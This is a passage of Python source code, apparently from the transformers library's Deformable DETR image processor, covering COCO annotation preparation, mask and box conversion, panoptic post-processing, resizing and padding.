COCO_PANOPTIC = "coco_panoptic"
SUPPORTED_ANNOTATION_FORMATS = (AnnotionFormat.COCO_DETECTION, AnnotionFormat.COCO_PANOPTIC)
# Copied from transformers.models.detr.image_processing_detr.get_size_with_aspect_ratio
def get_size_with_aspect_ratio(image_size, size, max_size=None) -> Tuple[int, int]:
"""
Computes the output image size given the input image size and the desired output size.
Args:
image_size (`Tuple[int, int]`):
The input image size.
size (`int`):
The desired output size.
max_size (`int`, *optional*):
The maximum allowed output size.
"""
height, width = image_size
if max_size is not None:
min_original_size = float(min((height, width)))
max_original_size = float(max((height, width)))
if max_original_size / min_original_size * size > max_size:
size = int(round(max_size * min_original_size / max_original_size))
if (height <= width and height == size) or (width <= height and width == size):
return height, width
if width < height:
ow = size
oh = int(size * height / width)
else:
oh = size
ow = int(size * width / height)
return (oh, ow)
# Copied from transformers.models.detr.image_processing_detr.get_resize_output_image_size
def get_resize_output_image_size(
input_image: np.ndarray, size: Union[int, Tuple[int, int], List[int]], max_size: Optional[int] = None
) -> Tuple[int, int]:
"""
Computes the output image size given the input image size and the desired output size. If the desired output size
is a tuple or list, the output image size is returned as is. If the desired output size is an integer, the output
image size is computed by keeping the aspect ratio of the input image size.
Args:
image_size (`Tuple[int, int]`):
The input image size.
size (`int`):
The desired output size.
max_size (`int`, *optional*):
The maximum allowed output size.
"""
image_size = get_image_size(input_image)
if isinstance(size, (list, tuple)):
return size
return get_size_with_aspect_ratio(image_size, size, max_size)
# Copied from transformers.models.detr.image_processing_detr.get_numpy_to_framework_fn
def get_numpy_to_framework_fn(arr) -> Callable:
"""
Returns a function that converts a numpy array to the framework of the input array.
Args:
arr (`np.ndarray`): The array to convert.
"""
if isinstance(arr, np.ndarray):
return np.array
if is_tf_available() and is_tf_tensor(arr):
import tensorflow as tf
return tf.convert_to_tensor
if is_torch_available() and is_torch_tensor(arr):
import torch
return torch.tensor
if is_flax_available() and is_jax_tensor(arr):
import jax.numpy as jnp
return jnp.array
raise ValueError(f"Cannot convert arrays of type {type(arr)}")
# Copied from transformers.models.detr.image_processing_detr.safe_squeeze
def safe_squeeze(arr: np.ndarray, axis: Optional[int] = None) -> np.ndarray:
"""
Squeezes an array, but only if the axis specified has dim 1.
"""
if axis is None:
return arr.squeeze()
try:
return arr.squeeze(axis=axis)
except ValueError:
return arr
# Copied from transformers.models.detr.image_processing_detr.normalize_annotation
def normalize_annotation(annotation: Dict, image_size: Tuple[int, int]) -> Dict:
image_height, image_width = image_size
norm_annotation = {}
for key, value in annotation.items():
if key == "boxes":
boxes = value
boxes = corners_to_center_format(boxes)
boxes /= np.asarray([image_width, image_height, image_width, image_height], dtype=np.float32)
norm_annotation[key] = boxes
else:
norm_annotation[key] = value
return norm_annotation
# Copied from transformers.models.detr.image_processing_detr.max_across_indices
def max_across_indices(values: Iterable[Any]) -> List[Any]:
"""
Return the maximum value across all indices of an iterable of values.
"""
return [max(values_i) for values_i in zip(*values)]
# Copied from transformers.models.detr.image_processing_detr.get_max_height_width
def get_max_height_width(images: List[np.ndarray]) -> List[int]:
"""
Get the maximum height and width across all images in a batch.
"""
input_channel_dimension = infer_channel_dimension_format(images[0])
if input_channel_dimension == ChannelDimension.FIRST:
_, max_height, max_width = max_across_indices([img.shape for img in images])
elif input_channel_dimension == ChannelDimension.LAST:
max_height, max_width, _ = max_across_indices([img.shape for img in images])
else:
raise ValueError(f"Invalid channel dimension format: {input_channel_dimension}")
return (max_height, max_width)
# Copied from transformers.models.detr.image_processing_detr.make_pixel_mask
def make_pixel_mask(image: np.ndarray, output_size: Tuple[int, int]) -> np.ndarray:
"""
Make a pixel mask for the image, where 1 indicates a valid pixel and 0 indicates padding.
Args:
image (`np.ndarray`):
Image to make the pixel mask for.
output_size (`Tuple[int, int]`):
Output size of the mask.
"""
input_height, input_width = get_image_size(image)
mask = np.zeros(output_size, dtype=np.int64)
mask[:input_height, :input_width] = 1
return mask
# Copied from transformers.models.detr.image_processing_detr.convert_coco_poly_to_mask
def convert_coco_poly_to_mask(segmentations, height: int, width: int) -> np.ndarray:
"""
Convert a COCO polygon annotation to a mask.
Args:
segmentations (`List[List[float]]`):
List of polygons, each polygon represented by a list of x-y coordinates.
height (`int`):
Height of the mask.
width (`int`):
Width of the mask.
"""
try:
from pycocotools import mask as coco_mask
except ImportError:
raise ImportError("Pycocotools is not installed in your environment.")
masks = []
for polygons in segmentations:
rles = coco_mask.frPyObjects(polygons, height, width)
mask = coco_mask.decode(rles)
if len(mask.shape) < 3:
mask = mask[..., None]
mask = np.asarray(mask, dtype=np.uint8)
mask = np.any(mask, axis=2)
masks.append(mask)
if masks:
masks = np.stack(masks, axis=0)
else:
masks = np.zeros((0, height, width), dtype=np.uint8)
return masks
# Copied from transformers.models.detr.image_processing_detr.prepare_coco_detection_annotation with DETR->DeformableDetr
def prepare_coco_detection_annotation(image, target, return_segmentation_masks: bool = False):
"""
Convert the target in COCO format into the format expected by DeformableDetr.
"""
image_height, image_width = get_image_size(image)
image_id = target["image_id"]
image_id = np.asarray([image_id], dtype=np.int64)
# Get all COCO annotations for the given image.
annotations = target["annotations"]
annotations = [obj for obj in annotations if "iscrowd" not in obj or obj["iscrowd"] == 0]
classes = [obj["category_id"] for obj in annotations]
classes = np.asarray(classes, dtype=np.int64)
# for conversion to coco api
area = np.asarray([obj["area"] for obj in annotations], dtype=np.float32)
iscrowd = np.asarray([obj["iscrowd"] if "iscrowd" in obj else 0 for obj in annotations], dtype=np.int64)
boxes = [obj["bbox"] for obj in annotations]
# guard against no boxes via resizing
boxes = np.asarray(boxes, dtype=np.float32).reshape(-1, 4)
boxes[:, 2:] += boxes[:, :2]
boxes[:, 0::2] = boxes[:, 0::2].clip(min=0, max=image_width)
boxes[:, 1::2] = boxes[:, 1::2].clip(min=0, max=image_height)
keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
new_target = {}
new_target["image_id"] = image_id
new_target["class_labels"] = classes[keep]
new_target["boxes"] = boxes[keep]
new_target["area"] = area[keep]
new_target["iscrowd"] = iscrowd[keep]
new_target["orig_size"] = np.asarray([int(image_height), int(image_width)], dtype=np.int64)
if annotations and "keypoints" in annotations[0]:
keypoints = [obj["keypoints"] for obj in annotations]
keypoints = np.asarray(keypoints, dtype=np.float32)
num_keypoints = keypoints.shape[0]
keypoints = keypoints.reshape((-1, 3)) if num_keypoints else keypoints
new_target["keypoints"] = keypoints[keep]
if return_segmentation_masks:
segmentation_masks = [obj["segmentation"] for obj in annotations]
masks = convert_coco_poly_to_mask(segmentation_masks, image_height, image_width)
new_target["masks"] = masks[keep]
return new_target
# Copied from transformers.models.detr.image_processing_detr.masks_to_boxes
def masks_to_boxes(masks: np.ndarray) -> np.ndarray:
"""
Compute the bounding boxes around the provided panoptic segmentation masks.
Args:
masks: masks in format `[number_masks, height, width]` where N is the number of masks
Returns:
boxes: bounding boxes in format `[number_masks, 4]` in xyxy format
"""
if masks.size == 0:
return np.zeros((0, 4))
h, w = masks.shape[-2:]
y = np.arange(0, h, dtype=np.float32)
x = np.arange(0, w, dtype=np.float32)
# see https://github.com/pytorch/pytorch/issues/50276
y, x = np.meshgrid(y, x, indexing="ij")
x_mask = masks * np.expand_dims(x, axis=0)
x_max = x_mask.reshape(x_mask.shape[0], -1).max(-1)
x = np.ma.array(x_mask, mask=~(np.array(masks, dtype=bool)))
x_min = x.filled(fill_value=1e8)
x_min = x_min.reshape(x_min.shape[0], -1).min(-1)
y_mask = masks * np.expand_dims(y, axis=0)
y_max = y_mask.reshape(x_mask.shape[0], -1).max(-1)
y = np.ma.array(y_mask, mask=~(np.array(masks, dtype=bool)))
y_min = y.filled(fill_value=1e8)
y_min = y_min.reshape(y_min.shape[0], -1).min(-1)
return np.stack([x_min, y_min, x_max, y_max], 1)
# Copied from transformers.models.detr.image_processing_detr.prepare_coco_panoptic_annotation with DETR->DeformableDetr
def prepare_coco_panoptic_annotation(
image: np.ndarray, target: Dict, masks_path: Union[str, pathlib.Path], return_masks: bool = True
) -> Dict:
"""
Prepare a coco panoptic annotation for DeformableDetr.
"""
image_height, image_width = get_image_size(image)
annotation_path = pathlib.Path(masks_path) / target["file_name"]
new_target = {}
new_target["image_id"] = np.asarray([target["image_id"] if "image_id" in target else target["id"]], dtype=np.int64)
new_target["size"] = np.asarray([image_height, image_width], dtype=np.int64)
new_target["orig_size"] = np.asarray([image_height, image_width], dtype=np.int64)
if "segments_info" in target:
masks = np.asarray(PIL.Image.open(annotation_path), dtype=np.uint32)
masks = rgb_to_id(masks)
ids = np.array([segment_info["id"] for segment_info in target["segments_info"]])
masks = masks == ids[:, None, None]
masks = masks.astype(np.uint8)
if return_masks:
new_target["masks"] = masks
new_target["boxes"] = masks_to_boxes(masks)
new_target["class_labels"] = np.array(
[segment_info["category_id"] for segment_info in target["segments_info"]], dtype=np.int64
)
new_target["iscrowd"] = np.asarray(
[segment_info["iscrowd"] for segment_info in target["segments_info"]], dtype=np.int64
)
new_target["area"] = np.asarray(
[segment_info["area"] for segment_info in target["segments_info"]], dtype=np.float32
)
return new_target
# Copied from transformers.models.detr.image_processing_detr.get_segmentation_image
def get_segmentation_image(
masks: np.ndarray, input_size: Tuple, target_size: Tuple, stuff_equiv_classes, deduplicate=False
):
h, w = input_size
final_h, final_w = target_size
m_id = scipy.special.softmax(masks.transpose(0, 1), -1)
if m_id.shape[-1] == 0:
# We didn't detect any mask :(
m_id = np.zeros((h, w), dtype=np.int64)
else:
m_id = m_id.argmax(-1).reshape(h, w)
if deduplicate:
# Merge the masks corresponding to the same stuff class
for equiv in stuff_equiv_classes.values():
for eq_id in equiv:
m_id[m_id == eq_id] = equiv[0]
seg_img = id_to_rgb(m_id)
seg_img = resize(seg_img, (final_w, final_h), resample=PILImageResampling.NEAREST)
return seg_img
# Copied from transformers.models.detr.image_processing_detr.get_mask_area
def get_mask_area(seg_img: np.ndarray, target_size: Tuple[int, int], n_classes: int) -> np.ndarray:
final_h, final_w = target_size
np_seg_img = seg_img.astype(np.uint8)
np_seg_img = np_seg_img.reshape(final_h, final_w, 3)
m_id = rgb_to_id(np_seg_img)
area = [(m_id == i).sum() for i in range(n_classes)]
return area
# Copied from transformers.models.detr.image_processing_detr.score_labels_from_class_probabilities
def score_labels_from_class_probabilities(logits: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
probs = scipy.special.softmax(logits, axis=-1)
labels = probs.argmax(-1, keepdims=True)
scores = np.take_along_axis(probs, labels, axis=-1)
scores, labels = scores.squeeze(-1), labels.squeeze(-1)
return scores, labels
# Copied from transformers.models.detr.image_processing_detr.post_process_panoptic_sample
def post_process_panoptic_sample(
out_logits: np.ndarray,
masks: np.ndarray,
boxes: np.ndarray,
processed_size: Tuple[int, int],
target_size: Tuple[int, int],
is_thing_map: Dict,
threshold=0.85,
) -> Dict:
"""
Converts the output of [`DetrForSegmentation`] into panoptic segmentation predictions for a single sample.
Args:
out_logits (`torch.Tensor`):
The logits for this sample.
masks (`torch.Tensor`):
The predicted segmentation masks for this sample.
boxes (`torch.Tensor`):
The prediced bounding boxes for this sample. The boxes are in the normalized format `(center_x, center_y,
width, height)` and values between `[0, 1]`, relative to the size the image (disregarding padding).
processed_size (`Tuple[int, int]`):
The processed size of the image `(height, width)`, as returned by the preprocessing step i.e. the size
after data augmentation but before batching.
target_size (`Tuple[int, int]`):
The target size of the image, `(height, width)` corresponding to the requested final size of the
prediction.
is_thing_map (`Dict`):
A dictionary mapping class indices to a boolean value indicating whether the class is a thing or not.
threshold (`float`, *optional*, defaults to 0.85):
The threshold used to binarize the segmentation masks.
"""
# we filter empty queries and detection below threshold
scores, labels = score_labels_from_class_probabilities(out_logits)
keep = (labels != out_logits.shape[-1] - 1) & (scores > threshold)
cur_scores = scores[keep]
cur_classes = labels[keep]
cur_boxes = center_to_corners_format(boxes[keep])
if len(cur_boxes) != len(cur_classes):
raise ValueError("Not as many boxes as there are classes")
cur_masks = masks[keep]
cur_masks = resize(cur_masks[:, None], processed_size, resample=PILImageResampling.BILINEAR)
cur_masks = safe_squeeze(cur_masks, 1)
b, h, w = cur_masks.shape
# It may be that we have several predicted masks for the same stuff class.
# In the following, we track the list of masks ids for each stuff class (they are merged later on)
cur_masks = cur_masks.reshape(b, -1)
stuff_equiv_classes = defaultdict(list)
for k, label in enumerate(cur_classes):
if not is_thing_map[label]:
stuff_equiv_classes[label].append(k)
seg_img = get_segmentation_image(cur_masks, processed_size, target_size, stuff_equiv_classes, deduplicate=True)
area = get_mask_area(cur_masks, processed_size, n_classes=len(cur_scores))
# We filter out any mask that is too small
if cur_classes.size() > 0:
# We know filter empty masks as long as we find some
filtered_small = np.array([a <= 4 for a in area], dtype=bool)
while filtered_small.any():
cur_masks = cur_masks[~filtered_small]
cur_scores = cur_scores[~filtered_small]
cur_classes = cur_classes[~filtered_small]
seg_img = get_segmentation_image(cur_masks, (h, w), target_size, stuff_equiv_classes, deduplicate=True)
area = get_mask_area(seg_img, target_size, n_classes=len(cur_scores))
filtered_small = np.array([a <= 4 for a in area], dtype=bool)
else:
cur_classes = np.ones((1, 1), dtype=np.int64)
segments_info = [
{"id": i, "isthing": is_thing_map[cat], "category_id": int(cat), "area": a}
for i, (cat, a) in enumerate(zip(cur_classes, area))
]
del cur_classes
with io.BytesIO() as out:
PIL.Image.fromarray(seg_img).save(out, format="PNG")
predictions = {"png_string": out.getvalue(), "segments_info": segments_info}
return predictions
# Copied from transformers.models.detr.image_processing_detr.resize_annotation
def resize_annotation(
annotation: Dict[str, Any],
orig_size: Tuple[int, int],
target_size: Tuple[int, int],
threshold: float = 0.5,
resample: PILImageResampling = PILImageResampling.NEAREST,
):
"""
Resizes an annotation to a target size.
Args:
annotation (`Dict[str, Any]`):
The annotation dictionary.
orig_size (`Tuple[int, int]`):
The original size of the input image.
target_size (`Tuple[int, int]`):
The target size of the image, as returned by the preprocessing `resize` step.
threshold (`float`, *optional*, defaults to 0.5):
The threshold used to binarize the segmentation masks.
resample (`PILImageResampling`, defaults to `PILImageResampling.NEAREST`):
The resampling filter to use when resizing the masks.
"""
ratios = tuple(float(s) / float(s_orig) for s, s_orig in zip(target_size, orig_size))
ratio_height, ratio_width = ratios
new_annotation = {}
new_annotation["size"] = target_size
for key, value in annotation.items():
if key == "boxes":
boxes = value
scaled_boxes = boxes * np.asarray([ratio_width, ratio_height, ratio_width, ratio_height], dtype=np.float32)
new_annotation["boxes"] = scaled_boxes
elif key == "area":
area = value
scaled_area = area * (ratio_width * ratio_height)
new_annotation["area"] = scaled_area
elif key == "masks":
masks = value[:, None]
masks = np.array([resize(mask, target_size, resample=resample) for mask in masks])
masks = masks.astype(np.float32)
masks = masks[:, 0] > threshold
new_annotation["masks"] = masks
elif key == "size":
new_annotation["size"] = target_size
else:
new_annotation[key] = value
return new_annotation
# Copied from transformers.models.detr.image_processing_detr.binary_mask_to_rle
def binary_mask_to_rle(mask):
"""
Converts given binary mask of shape `(height, width)` to the run-length encoding (RLE) format.
Args:
mask (`torch.Tensor` or `numpy.array`):
A binary mask tensor of shape `(height, width)` where 0 denotes background and 1 denotes the target
segment_id or class_id.
Returns:
`List`: Run-length encoded list of the binary mask. Refer to COCO API for more information about the RLE
format.
"""
if is_torch_tensor(mask):
mask = mask.numpy()
pixels = mask.flatten()
pixels = np.concatenate([[0], pixels, [0]])
runs = np.where(pixels[1:] != pixels[:-1])[0] + 1
runs[1::2] -= runs[::2]
return list(runs)
# Copied from transformers.models.detr.image_processing_detr.convert_segmentation_to_rle
def convert_segmentation_to_rle(segmentation):
"""
Converts given segmentation map of shape `(height, width)` to the run-length encoding (RLE) format.
Args:
segmentation (`torch.Tensor` or `numpy.array`):
A segmentation map of shape `(height, width)` where each value denotes a segment or class id.
Returns:
`List[List]`: A list of lists, where each list is the run-length encoding of a segment / class id.
"""
segment_ids = torch.unique(segmentation)
run_length_encodings = []
for idx in segment_ids:
mask = torch.where(segmentation == idx, 1, 0)
rle = binary_mask_to_rle(mask)
run_length_encodings.append(rle)
return run_length_encodings
# Copied from transformers.models.detr.image_processing_detr.remove_low_and_no_objects
def remove_low_and_no_objects(masks, scores, labels, object_mask_threshold, num_labels):
"""
Binarize the given masks using `object_mask_threshold`, it returns the associated values of `masks`, `scores` and
`labels`.
Args:
masks (`torch.Tensor`):
A tensor of shape `(num_queries, height, width)`.
scores (`torch.Tensor`):
A tensor of shape `(num_queries)`.
labels (`torch.Tensor`):
A tensor of shape `(num_queries)`.
object_mask_threshold (`float`):
A number between 0 and 1 used to binarize the masks.
Raises:
`ValueError`: Raised when the first dimension doesn't match in all input tensors.
Returns:
`Tuple[`torch.Tensor`, `torch.Tensor`, `torch.Tensor`]`: The `masks`, `scores` and `labels` without the region
< `object_mask_threshold`.
"""
if not (masks.shape[0] == scores.shape[0] == labels.shape[0]):
raise ValueError("mask, scores and labels must have the same shape!")
to_keep = labels.ne(num_labels) & (scores > object_mask_threshold)
return masks[to_keep], scores[to_keep], labels[to_keep]
# Copied from transformers.models.detr.image_processing_detr.check_segment_validity
def check_segment_validity(mask_labels, mask_probs, k, mask_threshold=0.5, overlap_mask_area_threshold=0.8):
# Get the mask associated with the k class
mask_k = mask_labels == k
mask_k_area = mask_k.sum()
# Compute the area of all the stuff in query k
original_area = (mask_probs[k] >= mask_threshold).sum()
mask_exists = mask_k_area > 0 and original_area > 0
# Eliminate disconnected tiny segments
if mask_exists:
area_ratio = mask_k_area / original_area
if not area_ratio.item() > overlap_mask_area_threshold:
mask_exists = False
return mask_exists, mask_k
# Copied from transformers.models.detr.image_processing_detr.compute_segments
def compute_segments(
mask_probs,
pred_scores,
pred_labels,
mask_threshold: float = 0.5,
overlap_mask_area_threshold: float = 0.8,
label_ids_to_fuse: Optional[Set[int]] = None,
target_size: Tuple[int, int] = None,
):
height = mask_probs.shape[1] if target_size is None else target_size[0]
width = mask_probs.shape[2] if target_size is None else target_size[1]
segmentation = torch.zeros((height, width), dtype=torch.int32, device=mask_probs.device)
segments: List[Dict] = []
if target_size is not None:
mask_probs = nn.functional.interpolate(
mask_probs.unsqueeze(0), size=target_size, mode="bilinear", align_corners=False
)[0]
current_segment_id = 0
# Weigh each mask by its prediction score
mask_probs *= pred_scores.view(-1, 1, 1)
mask_labels = mask_probs.argmax(0) # [height, width]
# Keep track of instances of each class
stuff_memory_list: Dict[str, int] = {}
for k in range(pred_labels.shape[0]):
pred_class = pred_labels[k].item()
should_fuse = pred_class in label_ids_to_fuse
# Check if mask exists and large enough to be a segment
mask_exists, mask_k = check_segment_validity(
mask_labels, mask_probs, k, mask_threshold, overlap_mask_area_threshold
)
if mask_exists:
if pred_class in stuff_memory_list:
current_segment_id = stuff_memory_list[pred_class]
else:
current_segment_id += 1
# Add current object segment to final segmentation map
segmentation[mask_k] = current_segment_id
segment_score = round(pred_scores[k].item(), 6)
segments.append(
{
"id": current_segment_id,
"label_id": pred_class,
"was_fused": should_fuse,
"score": segment_score,
}
)
if should_fuse:
stuff_memory_list[pred_class] = current_segment_id
return segmentation, segments
class DeformableDetrImageProcessor(BaseImageProcessor):
r"""
Constructs a Deformable DETR image processor.
Args:
format (`str`, *optional*, defaults to `"coco_detection"`):
Data format of the annotations. One of "coco_detection" or "coco_panoptic".
do_resize (`bool`, *optional*, defaults to `True`):
Controls whether to resize the image's (height, width) dimensions to the specified `size`. Can be
overridden by the `do_resize` parameter in the `preprocess` method.
size (`Dict[str, int]` *optional*, defaults to `{"shortest_edge": 800, "longest_edge": 1333}`):
Size of the image's (height, width) dimensions after resizing. Can be overridden by the `size` parameter in
the `preprocess` method.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BILINEAR`):
Resampling filter to use if resizing the image.
do_rescale (`bool`, *optional*, defaults to `True`):
Controls whether to rescale the image by the specified scale `rescale_factor`. Can be overridden by the
`do_rescale` parameter in the `preprocess` method.
rescale_factor (`int` or `float`, *optional*, defaults to `1/255`):
Scale factor to use if rescaling the image. Can be overridden by the `rescale_factor` parameter in the
`preprocess` method.
do_normalize:
Controls whether to normalize the image. Can be overridden by the `do_normalize` parameter in the
`preprocess` method.
image_mean (`float` or `List[float]`, *optional*, defaults to `IMAGENET_DEFAULT_MEAN`):
Mean values to use when normalizing the image. Can be a single value or a list of values, one for each
channel. Can be overridden by the `image_mean` parameter in the `preprocess` method.
image_std (`float` or `List[float]`, *optional*, defaults to `IMAGENET_DEFAULT_STD`):
Standard deviation values to use when normalizing the image. Can be a single value or a list of values, one
for each channel. Can be overridden by the `image_std` parameter in the `preprocess` method.
do_pad (`bool`, *optional*, defaults to `True`):
Controls whether to pad the image to the largest image in a batch and create a pixel mask. Can be
overridden by the `do_pad` parameter in the `preprocess` method.
"""
model_input_names = ["pixel_values", "pixel_mask"]
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.__init__
def __init__(
self,
format: Union[str, AnnotionFormat] = AnnotionFormat.COCO_DETECTION,
do_resize: bool = True,
size: Dict[str, int] = None,
resample: PILImageResampling = PILImageResampling.BILINEAR,
do_rescale: bool = True,
rescale_factor: Union[int, float] = 1 / 255,
do_normalize: bool = True,
image_mean: Union[float, List[float]] = None,
image_std: Union[float, List[float]] = None,
do_pad: bool = True,
**kwargs,
) -> None:
if "pad_and_return_pixel_mask" in kwargs:
do_pad = kwargs.pop("pad_and_return_pixel_mask")
if "max_size" in kwargs:
warnings.warn(
"The `max_size` parameter is deprecated and will be removed in v4.26. "
"Please specify in `size['longest_edge'] instead`.",
FutureWarning,
)
max_size = kwargs.pop("max_size")
else:
max_size = None if size is None else 1333
size = size if size is not None else {"shortest_edge": 800, "longest_edge": 1333}
size = get_size_dict(size, max_size=max_size, default_to_square=False)
super().__init__(**kwargs)
self.format = format
self.do_resize = do_resize
self.size = size
self.resample = resample
self.do_rescale = do_rescale
self.rescale_factor = rescale_factor
self.do_normalize = do_normalize
self.image_mean = image_mean if image_mean is not None else IMAGENET_DEFAULT_MEAN
self.image_std = image_std if image_std is not None else IMAGENET_DEFAULT_STD
self.do_pad = do_pad
@property
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.max_size
def max_size(self):
warnings.warn(
"The `max_size` parameter is deprecated and will be removed in v4.27. "
"Please specify in `size['longest_edge'] instead`.",
FutureWarning,
)
return self.size["longest_edge"]
@classmethod
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.from_dict with Detr->DeformableDetr
def from_dict(cls, image_processor_dict: Dict[str, Any], **kwargs):
"""
Overrides the `from_dict` method from the base class to make sure parameters are updated if image processor is
created using from_dict and kwargs e.g. `DeformableDetrImageProcessor.from_pretrained(checkpoint, size=600,
max_size=800)`
"""
image_processor_dict = image_processor_dict.copy()
if "max_size" in kwargs:
image_processor_dict["max_size"] = kwargs.pop("max_size")
if "pad_and_return_pixel_mask" in kwargs:
image_processor_dict["pad_and_return_pixel_mask"] = kwargs.pop("pad_and_return_pixel_mask")
return super().from_dict(image_processor_dict, **kwargs)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.prepare_annotation with DETR->DeformableDetr
def prepare_annotation(
self,
image: np.ndarray,
target: Dict,
format: Optional[AnnotionFormat] = None,
return_segmentation_masks: bool = None,
masks_path: Optional[Union[str, pathlib.Path]] = None,
) -> Dict:
"""
Prepare an annotation for feeding into DeformableDetr model.
"""
format = format if format is not None else self.format
if format == AnnotionFormat.COCO_DETECTION:
return_segmentation_masks = False if return_segmentation_masks is None else return_segmentation_masks
target = prepare_coco_detection_annotation(image, target, return_segmentation_masks)
elif format == AnnotionFormat.COCO_PANOPTIC:
return_segmentation_masks = True if return_segmentation_masks is None else return_segmentation_masks
target = prepare_coco_panoptic_annotation(
image, target, masks_path=masks_path, return_masks=return_segmentation_masks
)
else:
raise ValueError(f"Format {format} is not supported.")
return target
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.prepare
def prepare(self, image, target, return_segmentation_masks=None, masks_path=None):
warnings.warn(
"The `prepare` method is deprecated and will be removed in a future version. "
"Please use `prepare_annotation` instead. Note: the `prepare_annotation` method "
"does not return the image anymore.",
)
target = self.prepare_annotation(image, target, return_segmentation_masks, masks_path, self.format)
return image, target
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.convert_coco_poly_to_mask
def convert_coco_poly_to_mask(self, *args, **kwargs):
warnings.warn("The `convert_coco_poly_to_mask` method is deprecated and will be removed in a future version. ")
return convert_coco_poly_to_mask(*args, **kwargs)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.prepare_coco_detection
def prepare_coco_detection(self, *args, **kwargs):
warnings.warn("The `prepare_coco_detection` method is deprecated and will be removed in a future version. ")
return prepare_coco_detection_annotation(*args, **kwargs)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.prepare_coco_panoptic
def prepare_coco_panoptic(self, *args, **kwargs):
warnings.warn("The `prepare_coco_panoptic` method is deprecated and will be removed in a future version. ")
return prepare_coco_panoptic_annotation(*args, **kwargs)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.resize
def resize(
self,
image: np.ndarray,
size: Dict[str, int],
resample: PILImageResampling = PILImageResampling.BILINEAR,
data_format: Optional[ChannelDimension] = None,
**kwargs,
) -> np.ndarray:
"""
Resize the image to the given size. Size can be `min_size` (scalar) or `(height, width)` tuple. If size is an
int, smaller edge of the image will be matched to this number.
"""
if "max_size" in kwargs:
warnings.warn(
"The `max_size` parameter is deprecated and will be removed in v4.26. "
"Please specify in `size['longest_edge'] instead`.",
FutureWarning,
)
max_size = kwargs.pop("max_size")
else:
max_size = None
size = get_size_dict(size, max_size=max_size, default_to_square=False)
if "shortest_edge" in size and "longest_edge" in size:
size = get_resize_output_image_size(image, size["shortest_edge"], size["longest_edge"])
elif "height" in size and "width" in size:
size = (size["height"], size["width"])
else:
raise ValueError(
"Size must contain 'height' and 'width' keys or 'shortest_edge' and 'longest_edge' keys. Got"
f" {size.keys()}."
)
image = resize(image, size=size, resample=resample, data_format=data_format)
return image
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.resize_annotation
def resize_annotation(
self,
annotation,
orig_size,
size,
resample: PILImageResampling = PILImageResampling.NEAREST,
) -> Dict:
"""
Resize the annotation to match the resized image. If size is an int, smaller edge of the mask will be matched
to this number.
"""
return resize_annotation(annotation, orig_size=orig_size, target_size=size, resample=resample)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.rescale
def rescale(
self, image: np.ndarray, rescale_factor: Union[float, int], data_format: Optional[ChannelDimension] = None
) -> np.ndarray:
"""
Rescale the image by the given factor.
"""
return rescale(image, rescale_factor, data_format=data_format)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.normalize
def normalize(
self,
image: np.ndarray,
mean: Union[float, Iterable[float]],
std: Union[float, Iterable[float]],
data_format: Optional[ChannelDimension] = None,
) -> np.ndarray:
"""
Normalize the image with the given mean and standard deviation.
"""
return normalize(image, mean=mean, std=std, data_format=data_format)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.normalize_annotation
def normalize_annotation(self, annotation: Dict, image_size: Tuple[int, int]) -> Dict:
"""
Normalize the boxes in the annotation from `[top_left_x, top_left_y, bottom_right_x, bottom_right_y]` to
`[center_x, center_y, width, height]` format.
"""
return normalize_annotation(annotation, image_size=image_size)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.pad_and_create_pixel_mask
def pad_and_create_pixel_mask(
self,
pixel_values_list: List[ImageInput],
return_tensors: Optional[Union[str, TensorType]] = None,
data_format: Optional[ChannelDimension] = None,
) -> BatchFeature:
"""
Pads a batch of images with zeros to the size of largest height and width in the batch and returns their
corresponding pixel mask.
Args:
images (`List[np.ndarray]`):
Batch of images to pad.
return_tensors (`str` or `TensorType`, *optional*):
The type of tensors to return. Can be one of:
- Unset: Return a list of `np.ndarray`.
- `TensorType.TENSORFLOW` or `'tf'`: Return a batch of type `tf.Tensor`.
- `TensorType.PYTORCH` or `'pt'`: Return a batch of type `torch.Tensor`.
- `TensorType.NUMPY` or `'np'`: Return a batch of type `np.ndarray`.
- `TensorType.JAX` or `'jax'`: Return a batch of type `jax.numpy.ndarray`.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
warnings.warn(
"This method is deprecated and will be removed in v4.27.0. Please use pad instead.", FutureWarning
)
# pad expects a list of np.ndarray, but the previous feature extractors expected torch tensors
images = [to_numpy_array(image) for image in pixel_values_list]
return self.pad(
images=images,
return_pixel_mask=True,
return_tensors=return_tensors,
data_format=data_format,
)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor._pad_image
def _pad_image(
self,
image: np.ndarray,
output_size: Tuple[int, int],
constant_values: Union[float, Iterable[float]] = 0,
data_format: Optional[ChannelDimension] = None,
) -> np.ndarray:
"""
Pad an image with zeros to the given size.
"""
input_height, input_width = get_image_size(image)
output_height, output_width = output_size
pad_bottom = output_height - input_height
pad_right = output_width - input_width
padding = ((0, pad_bottom), (0, pad_right))
padded_image = pad(
image, padding, mode=PaddingMode.CONSTANT, constant_values=constant_values, data_format=data_format
)
return padded_image
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.pad
def pad(
self,
images: List[np.ndarray],
constant_values: Union[float, Iterable[float]] = 0,
return_pixel_mask: bool = True,
return_tensors: Optional[Union[str, TensorType]] = None,
data_format: Optional[ChannelDimension] = None,
) -> np.ndarray:
"""
Pads a batch of images to the bottom and right of the image with zeros to the size of largest height and width
in the batch and optionally returns their corresponding pixel mask.
Args:
image (`np.ndarray`):
Image to pad.
constant_values (`float` or `Iterable[float]`, *optional*):
The value to use for the padding if `mode` is `"constant"`.
return_pixel_mask (`bool`, *optional*, defaults to `True`):
Whether to return a pixel mask.
